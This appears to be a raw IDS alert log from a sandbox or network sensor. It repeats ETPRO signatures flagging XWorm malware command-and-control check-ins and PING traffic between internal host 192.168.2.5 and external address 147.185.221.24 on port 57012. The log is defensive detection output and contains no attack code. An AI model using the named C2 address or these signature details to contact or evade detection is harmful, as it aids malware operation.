                                                          2025-01-03T22:21:15.709200+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.818562+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.818562+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.927898+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.927898+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.037442+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.037442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.146716+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.146716+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.258991+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.258991+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.365551+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.365551+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.474940+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.474940+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.584134+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.584134+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.695233+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.695233+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.802963+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.802963+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.964527+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:16.964527+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.118865+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.118865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.404915+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.404915+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.506327+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.506327+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.615463+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.615463+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.725035+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.725035+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.754451+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2457012192.168.2.549941TCP
                                                          2025-01-03T22:21:17.756393+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549941147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.834350+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.834350+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.943721+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:17.943721+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.053060+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.053060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.162512+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.162512+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.308123+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.308123+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.381345+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.381345+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.490547+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.490547+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.599959+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.599959+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.712103+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.712103+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.818735+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.818735+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.928055+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:18.928055+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.039281+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.039281+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.150163+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.150163+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.256122+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.256122+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.365473+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.365473+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.476318+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.476318+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.603984+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.603984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.710330+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.710330+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.912918+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:19.912918+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.121013+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.121013+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.224917+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.224917+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.334432+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.334432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.445079+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.445079+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.553100+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.553100+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.662347+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.662347+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.771857+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.771857+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.881106+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.881106+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.990386+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:20.990386+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.100101+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.100101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.209764+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.209764+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.318697+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.318697+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.457028+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.457028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.538561+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.538561+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.646846+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.646846+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.756331+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.756331+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.867711+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.867711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.974999+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:21.974999+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.084288+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.084288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.219435+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.219435+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.303129+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.303129+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.412965+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.412965+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.793923+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.793923+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.899190+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:22.899190+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.006285+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.006285+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.115411+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.115411+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.225065+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.225065+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.334310+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.334310+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.443686+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.443686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.553107+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.553107+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.662529+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.662529+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.771935+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.771935+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.881333+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.881333+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.990559+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:23.990559+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.099894+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.099894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.209562+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.209562+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.318779+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.318779+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.428093+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.428093+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.537500+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.537500+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.646802+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.646802+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.756240+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.756240+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.865712+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.865712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.975060+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:24.975060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.084454+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.084454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.194973+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.194973+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.303035+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.303035+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.412401+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.412401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.521747+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.521747+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.631419+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.631419+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.740507+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.740507+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.849916+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.849916+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.959299+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:25.959299+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.068791+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.068791+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.178065+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.178065+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.289849+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:26.289849+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
